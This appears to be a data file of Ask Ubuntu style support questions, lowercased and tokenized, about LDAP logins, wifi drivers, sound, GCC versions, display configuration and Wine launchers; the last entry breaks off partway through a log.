448589	ldap authentication : not able to login through gui but able to login from console	i am building a ltsp environment with ldap authentication . i have configured the ltsp , ldap server and client perfectly . i checked with getent passwd command in ltsp/ldap client . i can see my ldap users details . when i booted my ltsp thin client , i am able to login with ldap user credentials in alt+ctrl+f1 mode . but , not able to login through gui ( lightdm ) . see the logs which is from ltsp/ldap client . /var/log/ldm.log : apr 15 18:15:53 : [ ldm ] info : started on client with ip address : 192.168.12.34 apr 15 18:15:53 : [ ldm ] info : calling rc.d init scripts apr 15 18:15:55 : [ ldm ] info : authenticating with backend : ssh apr 15 18:16:09 : [ ssh ] info : calling rc.d pressh scripts apr 15 18:16:32 : [ ssh ] critical : no response , restarting apr 15 18:16:34 : [ ldm ] info : started on client with ip address : 192.168.12.34 apr 15 18:16:34 : [ ldm ] info : calling rc.d init scripts apr 15 18:16:35 : [ ldm ] info : authenticating with backend : ssh apr 15 18:17:55 : [ ssh ] info : calling rc.d pressh scripts apr 15 18:18:18 : [ ssh ] critical : no response , restarting /var/log/auth.log ( ldap server ) : apr 16 18:41:54 dennis sshd [ 2727 ] : connection closed by 192.168.12.34 [ preauth ] apr 16 18:41:54 dennis sshd [ 2729 ] : connection closed by 192.168.12.34 [ preauth ] apr 16 18:42:09 dennis sshd [ 2731 ] : invalid user myusername from 192.168.12.34 apr 16 18:42:09 dennis sshd [ 2731 ] : input_userauth_request : invalid user myusername [ preauth ] apr 16 18:42:09 dennis sshd [ 2731 ] : pam_unix ( sshd : auth ) : check pass ; user unknown apr 16 18:42:09 dennis sshd [ 2731 ] : pam_unix ( sshd : auth ) : authentication failure ; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.12.34 apr 16 18:42:11 dennis sshd [ 2731 ] : failed password for invalid user myusername from 192.168.12.34 port 38059 ssh2 apr 16 18:42:11 dennis sshd [ 2731 ] : connection closed by 192.168.12.34 [ preauth ] how to solve this ?
448592	usb wifi rtl8188cus 802.11n can not connect	i 'm a novice linux newbie and i 'm trying to use the adapter mentioned above in ubuntu 12.04 lts but it wont work . i have read other questions on here , but nothing helps . adaptor is finding the router , but can not connect . i 'm getting the 'authenticate connection ' splash screen every so often . i have renewed passphrases etc . lsusb output is - bus 001 device 002 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan bus 002 device 002 : id 046d : c05b logitech , inc. m-u0004 810-001317 [ b110 optical usb mouse ] bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub wireless is not hard or soft blocked the system appears to have recognized the adapter ? please let me know if you need any other stats . i have an installation/drivers cd which has 8188cus-linux.rar file in a 88_92_cu_driver folder but i 'm not sure what to do with it ? install cd is mainly set up for windows installs with a 'setup.exe ' folder on it . i hope you can help , it 's driving me nuts ! thanks david
448593	pulseaudio resets volume control to 100 % -- does n't save volume	running ubuntu 13.10 and each time i login , my volume control is reset to 100 % . pulseaudio never saves its state . i can run pacmd set-sink-volume 0 26000 on the cmd line to set it back to 40 % , but it does n't save state . i tried adding it to `` .profile '' in my home directory , but that runs the command before pulseaudio sets the volume , so it has no effect . any ideas on how to fix this ?
448596	zeitgeist search from command line	i have a folder with a few hundred pdf files . in the past months i opened quite a few of them and would like to know which i actually opened . i know there is zeitgeist which logs file activity but the search feature of gnome-activity-journal is broken . is there a way to search within a list of recently opened pdf files using the zeitgeist database or otherwise preferably ( but not necessarily ) from the terminal ?
448597	xorg.conf getting backed up to xorg.conf.date and then deleted almost daily	i am having an issue where my xorg.conf file is getting copied to xorg.conf. < date > ( e.g . today was xorg.conf.04142014 ) and then deleted . this happens almost daily . upon next boot , there will be no gui . i have to use ctrl+alt+f2 to get to a terminal and cp the xorg backup to xorg.conf and then reboot . everything comes back up fine after that . i had to install the nvidia drivers via package ( in synaptic : nvidia-331-updates ) , rather than additional drivers . additional drivers will hang on `` applying updates '' with the progress bar making no progress after installing the package , the additional drivers tab does correctly show that i am using the nvidia updates driver .
448598	allow access to all users to /mnt/volume	i have mounted a disc ( /dev/sdc1 ) at /mnt/media/ with the following command in my /etc/fstab /dev/sdc1 /mnt/media ext4 user 0 2 however i do n't have access for all users . only root has read-write access . can anyone please tell me which settings to include in this command to allow access for all users ? it is my intention to create a symbolic link to folders upon this disc in the home folders of all users to allow sharing of files .
448600	ubuntu server 12.04 lts vps + wine + .exe + ttf fonts + autologon and autostart	i have 2 questions to any linux or ubuntu pro here : 1 ) how to install wingding.ttf under wine ( in ubuntu server ) . ... i tried many ways and i can use this font under libreoffice e.g . but it doesnt work under my wine ( windows app .exe ) . and it never ask me to agree eula . off course i found also the entry here in the forum but it does not solve my problem . 2 ) i have to install a wine application on my ubuntu server which should start automatically after a server reboot . 2a ) so first i tried to make an autologin and include the wine app in the rc.local . ... but this did n't work because the app need the x-server which is n't startet before the login . 2b ) so after that i put this wine app into the autostart of my user and logged in by hand . ... the wine app startet successfully after my login . 2c ) but when i put this user to autologin and let the wine app in the autostart , my wine app is n't starting automatically : - ( please help ! would be really great if any expert can help me here .
448605	window is opened minimized	example : download a file via chromium click on show in folder nautilus is opened maximized close nautilus window click again on show in folder nautilus window is opened minimized ( not visible ) this happens in other cases . is there any setting for this ? i want to open such windows always maximized .
448606	search shortcut does n't work	i have a problem with the search shortcut on ubuntu 13.10 . somehow the shortcut for search does not work anymore ( ctrl+f ) . in keyboard > shortcuts the search is defined with ctrl+f but , for example , i ca n't activate the search function in firefox with this shortcut .
448607	ubuntu 14.04 and dell latitude e5540 multiple monitors not working	i am running ubuntu 14.04 and have the following configuration : lspci | grep vga 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 0b ) i docked my laptop and i have two lcd monitors connected via dvi . now i 'm able to see only one monitor in my displays . other monitor replicates my first monitor . so i have laptop screen and one monitor working . i want 2nd monitor also to be detected in my displays so that i could extend it . is there any one with similar problem ? i tried to install the nvidia drivers but no help .
448611	how do i log into my computer using ubuntu	i set up external flash drive to run ubuntu . how do i get it to work and not load windows xp ?
448612	cuda issues..need help	i have been trying for the last 3 days trying to get cuda to work on my labtop solely for the purpose of using pyrit . everytime i think i have got it pyrit will still only list cpu cores . my last current attempt has been running sudo apt-get install nvidia-current sudo apt-get install nvidia-cuda-dev nvidia-cuda-doc nvidia-cuda-gdb nvidia-cuda-toolkit this ran with out a hitch and still no gpu cores listed ; iâm at a loss any help would be appreciated i 'm new to ubuntu but i do love it . im running ubuntu 13.10 with nvidia 460m graphics card .
448613	how can i tell what partition is ubuntu	i am having boot problems . i have launched the ubuntu live cd and i can view the contents of my disk partitions . i seems to have other linux installations . how can i tell which one it ubuntu ? ( i think the other one is suze . ) i.e . by inspecting files etc rather than booting from one .
448616	folder view with high contrast theme	if i select the high contrast theme , then , when i open the home folder , its content is all black apart from the icons of the subfolders/icons ... how do i solve this problem ?
448617	key combination for each language	i want to have a combination for several language layout . ctrl + 1 - english us ctrl + 2 - romanian standard ctrl + 3 - german ctrl + 4 - swedish however , i ca n't find the romanian standard one . i have done all the keyboard - > shortcuts - > costum shortcuts thing , and using setxkbmap -layout ro does not do it for me . how can i choose the romanian standard keyboard ? i do n't want to press alt gr a every time i want to write ä and so on . i am a new ubuntu user , so i am sorry for asking such basic questions .
448618	how to play audio from different applications on different output devices ?	how can i play music on my speakers while i use my headset for video chat applications like skype ? should n't this be possible via this pulseaudio sound server that ubuntu uses ?
448621	creating a foobar.desktop file and a wine app icon on the launcher	this a specification of my previous question ( what 's a .desktop file ? ) where i wondered how to create a .desktop file in order to create an icon on the launcher for a wine application . i do n't understand what do we have to do with the following code : [ desktop entry ] name=foobar comment=foo & bar exec=sh -c `` cd /home/user/.wine/drive_c/program\ files/foobar_folder ; wine foobar.exe '' icon=wine terminal=false type=application categories=wine ; startupnotify=true replace user and foobar_folder with appropriate values . so you 'll be able to locate your application in the launcher by typing `` foobar '' . this is the top answer given to a question similar to my previous one , which you can see here : how does one create a custom application launcher for wine installed apps ? , but i do n't understand how shall i handle the code i just provided . i tried to copy and paste on the terminal , but it would n't work . in other words , i need that same answer but more comprehensively explained and easier to understand since i do n't get what to do with the code provided ! please note , i have few skills with computers . thank you very much ! : )
448626	driver issues regarding release versions	pc : asus g50-vt im sorry if this has been answered once already , but here is the issue , the laptop i have will install 12.04.4 , 12.10 , and 13.10 , the mouse works during installation on all three versions , but after installation it only works with 12.10 , my question is , how do i see the driver for this version , and i 'm guessing that in order to install the driver there is a sudo apt-get command . ty ahead of time . : )
448629	how do i set gcc 4.8 to be the default gcc ?	i 'm trying to update to gcc 4.8.2 . i have ubuntu 12.04. after this if i type gcc -v it says gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) next i typed sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install gcc-4.8 then i try to check the gcc version by typing gcc -v it says that my version did n't change and i still have gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) after typing gcc-4.8 -v i get 4.8 as the following : gcc version 4.8.1 ( ubuntu 4.8.1-2ubuntu1~12.04 ) now my question turns into why is n't it finding gcc 4.8.2 ? how can i set it to use gcc 4.8 as the default when i use gcc -v ?
448636	start services only when really required	i use my desktop box as dev `` server '' , so i have installed mysql+apache+whatever . this causes boot to last longer , also memory consumption is high since i have all this services running . does a software exists which can start a given service only when its port is accessed ? say : start apache only when there 's a request on localhost:80 and so on .
448638	asus x55a sound not working	i have problems with my sound - vanilla 12.04/13.10 ( asus x55a ) the sound driver seems to work correctly , but i do n't have any sound : ( i tried updating the alsa drivers but still the same : (
448639	ubuntu vga compatible driver installation	the output of my lspci -nn |grep vga is this : compatible controller [ 0300 ] : ati technologies inc radeon rv100 qy [ radeon 7000/ve ] [ 1002:5159 ] i need to install the adequate driver because i get this message error no video mode activated and my screen blinks even on recovery mode ( ubuntu 11.04 ) how can i install the appropriate driver ?
448641	wanting to set up a vnc connection between my linux laptop and windows desktop	so i recently received a new laptop and loaded up ubuntu on it . i take it with me to class so i can work on my projects away from my desk at home . however , i was hoping i could find a way to be able to vnc into my desktop ( windows 7 ) at home wherever i am . i can not seem to figure out how to set this up though , and any pointers would be much appreciated . i already downloaded a vnc server on my windows 7 box , but i would like to be able to connect when not in the same wireless network ( if possible ) . thanks in advance !
448643	overheating - ati hd6470m , ubuntu 13.10	i 'm trying linux for the first time ever and experiencing a lot of overheating . in about 45min after i turn on my laptop i get to temps like 90ยบc . i googled it and saw a lot of people with the same problem who identified its source as being the gpu . whenever i install the fglrx driver and reboot the system , i get a plain black screen with a black `` x '' as the mouse cursor ( which forces me to reinstall ubuntu ) . adding `` radeon.dpm=1 '' to the grub file and keeping the open-source driver did n't work too . i 've also tried some methods to switch between intel hd and amd , but could n't get those to work either . can anyone help ? anything that keeps my laptop from melting will suit , and i do n't intend to play games or use my gpu heavily in any way .
448648	wifi on esprimo v5535	i still have problems getting my esprimo v5535 from fujistsu siemens , to open wlan . i have looked everywhere and failed . it is an ath5k driver and the computer sees it . it says : eth1 link encap : ethernet hwaddr 00:1e:33:04 : ab:23 inet addr:192.168.1.102 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:33ff : fe04 : ab23/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14437 errors:0 dropped:0 overruns:0 frame:0 tx packets:12122 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:14272805 ( 14.2 mb ) tx bytes:1806907 ( 1.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:834 errors:0 dropped:0 overruns:0 frame:0 tx packets:834 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:84643 ( 84.6 kb ) tx bytes:84643 ( 84.6 kb ) and when i write lspci , it says : 00:01.0 pci bridge : silicon integrated systems [ sis ] agp port ( virtual pci-to-pci bridge ) 00:02.0 isa bridge : silicon integrated systems [ sis ] sis968 [ mutiol media io ] ( rev 01 ) 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 ide controller ( rev 01 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:04.0 ethernet controller : silicon integrated systems [ sis ] 191 gigabit ethernet adapter ( rev 02 ) 00:05.0 ide interface : silicon integrated systems [ sis ] sata controller / ide mode ( rev 03 ) 00:06.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:07.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:0f.0 audio device : silicon integrated systems [ sis ] azalia audio controller 00:1f.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) 02:00.0 ethernet controller : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) ( rev 04 ) somehow the driver is not seen , or opened , by ubuntu . on another computer , a hp dv6000 with a b43 driver , i succeeded opening the driver , by reinstalling ubuntu 10.04 and then updating this version . how come , the old version will find and open then wlan , but the new ubuntu 12.04 and 13.10 will not ? iwconfig says : lo no wireless extensions . eth1 no wireless extensions hope you can help me . i have spent several days , trying to find a solution . my patience has given me grey hairs . please understand that i am new to linux and ubuntu and do not understand the general commands in the os . have only been experimenting . and so far i did not succeed with wlan . otherwise i have spent days tryine ubuntu 12.04 , 13.10 and now reeinstalled 10.04 on two of my old harddiscs . ( they seem to run better ) best regards jan aamand petersen
448656	ubuntu liveusb not booting in hp laptop	i am using a hp pavilion laptop pre installed with windows 8 . i am trying to install ubuntu 13.04 on my laptop using a liveusb , which i created in the conventional way given on the ubuntu official site . the problem is that even after changing the boot order to usb stick in my bios , my system does n't boot from the liveusb . it boots directly from the hdd , due to which i do n't see the grub menu and system is automatically booted in windows 8 . i tried the same usb on a different system ( my assembled desktop which does n't support uefi ) , and it works fine there . the problem occurs only on my hp laptop . please help . thanks in advance . p.s . i tried installing ubuntu from wubi , but then there 's a whole different altogether . during boot , it shows an ubuntu option , but reports a missing file .
448662	my laptop monitor does not turn on in kde and i only have display when docked	i use kubuntu 12.04 64 bit . currently using the nvidia drivers for my dell e6510 . when the laptop is docked the two multiple monitors are working perfectly . when i restart when i am undocked the laptop display works fine until i log in to kde . then the screen goes blank and never returns . i assume this is an issue with xorg.conf ( which i provide below ) . i have tried using the system without the xorg but it looks terrible and the multiple monitor settings do n't work in the default kde display gui . ideally i would like to be able to undock and dock the machine and for the monitors to behave appropriately . but for now i would be grateful to use my laptop even on a restart when it is undocked . below is my xorg.conf : section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` samsung syncmaster '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 60.0 option `` dpms '' # horizsync source : edid , vertrefresh source : edid endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dp-0 : nvidia-auto-select +0+0 , dp-1 : nvidia-auto-select +1920+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' # generated from default endsection section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` nvs 3100m '' option `` nologo '' `` true '' endsection
448668	will ubuntu boot if the /boot partition is full ?	if the boot partition is 100 % full will my system still be able to boot ? i ask because i had a system go down and was unable to boot and i 'm trying to find the root cause . i 'm suspecting its because /boot was 100 % full but i do n't understand why . are temp files written in /boot during the boot process ?
448673	activate meta as a modified key	it seems that because meta key can be activated alone so some shortcut as meta+f ca n't work ( some , not all ) . since i get used to use alt+f1 instead so i want to disable activate meta key alone . how can i do ?
448677	recompiling the kernel after modifying the `` irq.c '' module	i modified the irq.c file in the kernel by including several printk ( ) statements to trace some values that i wanted to recovered . logically , after modifying the irq.c file i attempted to recompile the kernel using the following command : '' sudo make config_debug_section_mismatch=y -j 6 '' . the usual recompilation process was divided into 6 threads and went ahead a little faster . once that step was completed , i followed it with the command `` sudo make modules '' . the final output gave me two errors , which unfortunately i can not present here because i did them in a different computer at the university lab . needless to say , that step failed . to fix it i ran the command `` sudo mrproper '' and it reversed the changes , and i was able to compile another driver module . question : how can i recompile the kernel in ubuntu 12.10 ( linux-3.9.3-030903-generic ) after making changes to the internal irq module ?
448678	all folders turn locked suddenly while working	suddenly , all my files , folders and applications appear to be locked on my ubuntu 13.10 . afterwards , there is not a single application i can open unless i restart . when i try to open a terminal window , trying to execute a command , a warning appears with an input/output error . how can i fix it ?
448681	is there a package manager which allows arbitrary queries for status , name , last change timestamp	i imagine at least stable sortable columns ( or better columns with sort priority ) to show information for the equivalent of a query like `` show me installed packages whose status changed today , sorted alphabetically '' . i can also imagine an application which maps apt status and history to a database which i could query at will . a use case would be for example : you have installed one or two packages with a lot of dependencies and suggested packages ( which you did n't review with the necessary attention ) , you reboot and let 's say the sound no longer works . it would be nice to be able to query the history as described above to find the malious dependency and - if it was just a suggested package - remove it . i know about apt history log , but i do n't want to reinvent the wheel to write a script parsing it . furthermore i checked synaptic : no timestamp in columns , only one column sortable software-center : history overview comes closest to what i 'm looking for , but no multiselection for rows , no attention to current status ( i ca n't query packages which are currently installed because also packages which are meanwhile removed are listed ) and no sorting other than timestamp apper : no similar function
448686	why has wubi support been withdrawn ?	why has wubi support been withdrawn from ubuntu 12.10 onwards ? does ubuntu 14.04 have wubi support or not ?
448687	one command for ls and cat functionality ?	okay guys , this is an experimental question warning ! i often confuse cat and ls when quickly working on the console . not because i forget their meanings , no . just because i type without deeply thinking about the command - it just comes automatically . i am sure everyone knows what i am trying to explain : you do n't have to think what to type if your task is to list , say , a text file - or a directory . now , why two different commands ? thinks would be more fluently if there was a command that lists a directory if the target is a directory and that lists the content of a file if the target is a file . does such a command exist ? i know there are editors ( e. g. vim ) with the ability to list a directory . but this is not what i want , as i want to stay on the console . second , after opening a file through the vim directory listing there is no way back - at least none that i know . if there is no out-of-the-box solution i will try to make a small bash script ( wrapper ) to cat and ls . but this is not preferred , because when working with many different systems it has to be placed on each of them ...
448688	weird wireless issue on 12.04	i am having this weird issue with my wireless card ( intel centrino wireless n130 ) . if i restart the computer via the interface when it restarts it does n't seem to recognize my wifi card . however when i press the power button to restart my computer it works ! i honestly ca n't figure out why . however once i do have it working it works perfectly fine : s just having a problem at startup it seems . i want to fix the program so that i 'm not pressing the power button to turn on/off and restart my computer constantly . i am new to ubuntu so please be gentle . lol
448690	imei lost in galaxy nexus	after installing ubuntu touch , i was not getting any carrier signal though wifi was working . even after tapping around the cellular settings , there was no signal . something told me to check the imei by typing * # 06 # and i 'm not getting any imei . is there a possibility that my efs partition is gone ? i have not taken any backup either .
448691	how do you fix a gcc compile 127 error ? sudo apt-get install g++ does n't work	*emphasized text*when i try to run a program i get the following error . ubuntu @ ubuntu-virtualbox : ~/desktop $ make g++ -wall -wno-switch -i . -g -c -o pass.o pass.cpp make : g++ : command not found make : *** [ pass.o ] error 127 i could n't get gcc 4.8.2 installed because it said it could n't find it . i did install 4.8 i did the following to install gcc sudo add-apt-repository ppa : ubuntu-toolchain-f/test sudo apt-get update sudo apt-get install gcc-4.8 next i did sudo update-alternatives -- install /usr/bin/gcc gcc /usr/bin/gcc-4.6 60 -- slave /usr/bin/g++ g++ /usr/bin/g++-4.6 sudo update-alternatives -- install /usr/bin/gcc gcc /usr/bin/gcc-4.8 40 -- slave /usr/bin/g++ g++ /usr/bin/g++-4.8 sudo update-alternatives -- config gcc the only thing i can think of is i do n't have 4.8 when i type the command gcc -v it says gcc version 4.8.1 ( ubuntu 4.8.1-2ubuntu1~12.04 ) ok i run : ubuntu @ ubuntu-virtualbox : ~ $ sudo apt-get install g++ reading package lists ... done building dependency tree reading state information ... done g++ is already the newest version . g++ set to manually installed . the following package was automatically installed and is no longer required : thunderbird-globalmenu use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 293 not upgraded . ubuntu @ ubuntu-virtualbox : ~ $ g++ -v the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > ubuntu @ ubuntu-virtualbox : ~/desktop $ g++ -- help | grep version the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > ubuntu @ ubuntu-virtualbox : ~/desktop $ g++ -- version the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > ubuntu @ ubuntu-virtualbox : ~/desktop $ ^c ubuntu @ ubuntu-virtualbox : ~/desktop $ this command installs sudo apt-get install g++-4.4 libstdc++6-4.4-dev 4.4 ( i would like 4.8 ) ubuntu @ ubuntu-virtualbox : ~/desktop $ sudo apt-get install g++-4.4 libstdc++6-4.4-dev reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : cpp-4.4 gcc-4.4 gcc-4.4-base suggested packages : gcc-4.4-locales g++-4.4-multilib gcc-4.4-doc libstdc++6-4.4-dbg gcc-4.4-multilib libmudflap0-4.4-dev libgcc1-dbg libgomp1-dbg libmudflap0-dbg libcloog-ppl0 libppl-c2 libppl7 libstdc++6-4.4-doc the following new packages will be installed : cpp-4.4 g++-4.4 gcc-4.4 gcc-4.4-base libstdc++6-4.4-dev 0 upgraded , 5 newly installed , 0 to remove and 292 not upgraded . need to get 13.0 mb of archives . after this operation , 33.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ precise/main gcc-4.4-base i386 4.4.7-1ubuntu2 [ 12.0 kb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ precise/main cpp-4.4 i386 4.4.7-1ubuntu2 [ 3,606 kb ] get:3 http : //us.archive.ubuntu.com/ubuntu/ precise/main gcc-4.4 i386 4.4.7-1ubuntu2 [ 3,079 kb ] get:4 http : //us.archive.ubuntu.com/ubuntu/ precise/main libstdc++6-4.4-dev i386 4.4.7-1ubuntu2 [ 1,494 kb ] get:5 http : //us.archive.ubuntu.com/ubuntu/ precise/main g++-4.4 i386 4.4.7-1ubuntu2 [ 4,780 kb ] fetched 13.0 mb in 3s ( 3,563 kb/s ) selecting previously unselected package gcc-4.4-base . ( reading database ... 222776 files and directories currently installed . ) unpacking gcc-4.4-base ( from ... /gcc-4.4-base_4.4.7-1ubuntu2_i386.deb ) ... selecting previously unselected package cpp-4.4 . unpacking cpp-4.4 ( from ... /cpp-4.4_4.4.7-1ubuntu2_i386.deb ) ... selecting previously unselected package gcc-4.4 . unpacking gcc-4.4 ( from ... /gcc-4.4_4.4.7-1ubuntu2_i386.deb ) ... selecting previously unselected package libstdc++6-4.4-dev . unpacking libstdc++6-4.4-dev ( from ... /libstdc++6-4.4-dev_4.4.7-1ubuntu2_i386.deb ) ... selecting previously unselected package g++-4.4 . unpacking g++-4.4 ( from ... /g++-4.4_4.4.7-1ubuntu2_i386.deb ) ... processing triggers for man-db ... setting up gcc-4.4-base ( 4.4.7-1ubuntu2 ) ... setting up cpp-4.4 ( 4.4.7-1ubuntu2 ) ... setting up gcc-4.4 ( 4.4.7-1ubuntu2 ) ... setting up g++-4.4 ( 4.4.7-1ubuntu2 ) ... setting up libstdc++6-4.4-dev ( 4.4.7-1ubuntu2 ) ... i have tried replacing 4.4 with 4.8 but it does n't work . more importantly after using the 4.4 command above i still get the 127 error . i have been learning to program for the past month so when you answer please know i 'm newer than new , and do n't understand a lot if anything .
448692	can not play skm file	trying to watch my child 's video clip shot , made with an obsolete phone camera . the screen showed pink on smplayer . i could not view any clip at all . i received a audio/x-gst-fourcc-sqcp decoder= - error under ubuntu . the file 's extension is .skm .
448699	samba printserver with 12.04	i am now trying to setup a print server with cups & samba , but constantly fail . i found an outdated samba in the 12.04 repository that has known bugs since 2012 . i found a false dependency in swat package exists since 2012 . is 12.04 the wrong decision to setup a print server ? at least `` lts '' does not match . sorry if i am negative , but after two weeks ... now here is the trouble : cups works samba works print $ works printing via cups works but printing via samba fails i get a 0x00000006 error . is there so who was a working configuration for 12.04 lts ?
448700	how do you install ubuntu desktop on nexus 7 using the newest version of multirom ( v23 )	i 'm using a nexus 7 ( flo ) and have multirom installed . recently i updated and the option that was there to install a ubuntu rom was gone i tried to insert a boot img . but teamwin could n't unpack it . any help will be gladly appreciated . thanks edit : i tried to uninstall multirom thinking i could install multirom v16 ( the last version of that supported ubuntu desktop 13.04 but all the sites that i trusted to give me the correct stuff only had v23 . so i reinstalled multirom and restored my data on it . i want to install ubuntu without wiping my data .
448701	connecting through quartz to ubuntu does not show desktop only menubar	hi i am a newbie to ubuntu . installed 12.04 lts on an intel nuc and everything is running fine . can ssh in from my macbook . however i also would like to remotely run the desktop so i installed quartz on my macbook and connected using ssh -x username @ ubuntubox and then issue the command gnome-session -- session=ubuntu-2d it then shows my menu bar that i normally see at the top with the mail icon , sound , clock and settings at the right . but my desktop is not showing . this is the output i get from xterm : gnome_keyring_control=/tmp/keyring-m4a7jf ssh_auth_sock=/tmp/keyring-m4a7jf/ssh gnome_keyring_pid=3409 gnome_keyring_control=/tmp/keyring-m4a7jf ssh_auth_sock=/tmp/keyring-m4a7jf/ssh gnome_keyring_control=/tmp/keyring-m4a7jf ssh_auth_sock=/tmp/keyring-m4a7jf/ssh gnome_keyring_control=/tmp/keyring-m4a7jf ssh_auth_sock=/tmp/keyring-m4a7jf/ssh gpg_agent_info=/tmp/keyring-m4a7jf/gpg:0:1 xlib : extension `` dpms '' missing on display `` localhost:10.0 '' . ( gnome-settings-daemon:3408 ) : power-plugin-warning ** : failed set dpms mode : display is not dpms capable [ 1397673619,000 , xklavier.c : xkl_engine_start_listen/ ] the backend does not require manual layout management - but it is provided by the application window manager warning : screen 0 on display `` localhost:10.0 '' already has a window manager ( gnome-settings-daemon:3408 ) : keyboard-plugin-warning ** : failed to set the keyboard layouts : gdbus.error : org.freedesktop.accounts.error.permissiondenied : not authorized window manager warning : screen 0 on display `` localhost:10.0 '' already has a window manager ** ( gnome-settings-daemon:3408 ) : warning ** : failed to connect context : connection refused ( gnome-settings-daemon:3408 ) : common-plugin-warning ** : key 0x70 ( keycodes : 43 ) with state 0x4000000 ( resolved to 0x0 ) has no usable modifiers ( usable modifiers are 0x140000fd ) ( gnome-settings-daemon:3408 ) : clipboard-plugin-warning ** : clipboard manager is already running . unity-2d-panel : [ debug ] scanning panel plugin directory `` /usr/lib/unity-2d/plugins/panel '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-appindicator.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-appname.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-indicator.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-legacytray.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-separator.so '' unity-2d-shell : [ debug ] bool keymonitor : :registerevents ( ) : could not open device : virtual core pointer unity-2d-panel : [ debug ] configured plugins list is : ( `` appname '' , `` ! legacytray '' , `` indicator '' ) unity-2d-shell : [ debug ] bool keymonitor : :registerevents ( ) : could not open device : virtual core keyboard unity-2d-shell : [ debug ] static void windowimageprovider : :activatecomposite ( ) : server does n't support the composite extension . ( bluetooth-applet:3572 ) : bluetooth-warning ** : could not open rfkill control device , please verify your installation ** ( nm-applet:3569 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.33 '' ( uid=1000 pid=3569 comm= '' nm-applet `` ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.networkmanager '' ( uid=0 pid=1182 comm= '' networkmanager `` ) initializing nautilus-gdu extension ** message : applet now removed from the notification area ** message : using fallback from indicator to gtkstatusicon xinput version 2.3 found unity-2d-shell : [ warning ] libindicator : desktop file '/usr/share/applications/google-chrome.desktop ' is using a deprecated format for its actions that will be dropped soon . unity-2d-shell : [ warning ] libindicator : desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . unity-2d-shell : [ warning ] libindicator : desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . unity-2d-shell : [ warning ] libindicator : desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . unity-2d-panel : [ debug ] bool keymonitor : :registerevents ( ) : could not open device : virtual core pointer unity-2d-panel : [ debug ] bool keymonitor : :registerevents ( ) : could not open device : virtual core keyboard unity-2d-panel : [ warning ] x error : badwindow ( invalid window parameter ) 3 major opcode : 18 ( x_changeproperty ) resource id : 0x0 unity-2d-panel : [ debug ] virtual void hotkey : :connectnotify ( const char* ) : grabbing hotkey `` alt+f10 '' ** message : moving back from gtkstatusicon to indicator ** ( gnome-settings-daemon:3408 ) : warning ** : failed to connect context : 